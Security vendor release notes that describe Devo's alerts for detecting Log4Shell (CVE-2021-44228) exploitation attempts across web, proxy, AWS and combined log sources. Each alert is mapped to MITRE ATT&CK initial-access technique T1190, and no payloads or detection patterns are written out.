Log4Shell detection release notes
- Juan Tomás Alonso Nieto (Deactivated)
The below document contains the release notes of the specific detections that Devo has released to detect whether your organization is being actively probed for log4j exploitation susceptibility.
Image credits by Swiss Government Computer Emergency Response Team (GovCERT)
Data Source | Domains All. Union Table (Data from DNS, Proxy, Web, IDS, and many others) |
|---|---|
Affected Columns | raw |
Alert Description | Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies. |
Mitre Tactic | Initial-access TA0001 |
Mitre Technique | Exploit Public-Facing Application T1190 |
Data Source | Web |
|---|---|
Affected Columns | raw |
Alert Description | Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies |
Mitre Tactic | Initial-access TA0001 |
Mitre Technique | Exploit Public-Facing Application T1190 |
Data Source | Proxy |
|---|---|
Affected Columns | raw |
Alert Description | Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies |
Mitre Tactic | Initial-access TA0001 |
Mitre Technique | Exploit Public-Facing Application T1190 |
Data Source | Cloud AWS |
|---|---|
Affected Columns | raw |
Alert Description | Alert that checks attempts of exploiting CVE-2021-44228 known as Log4shell. The query looks for payload patterns associated with this vulnerability on the log raw message. This would include payloads included in the url, user-agent header, referer header or POST and PUT HTTP bodies |
Mitre Tactic | Initial-access TA0001 |
Mitre Technique | Exploit Public-Facing Application T1190 |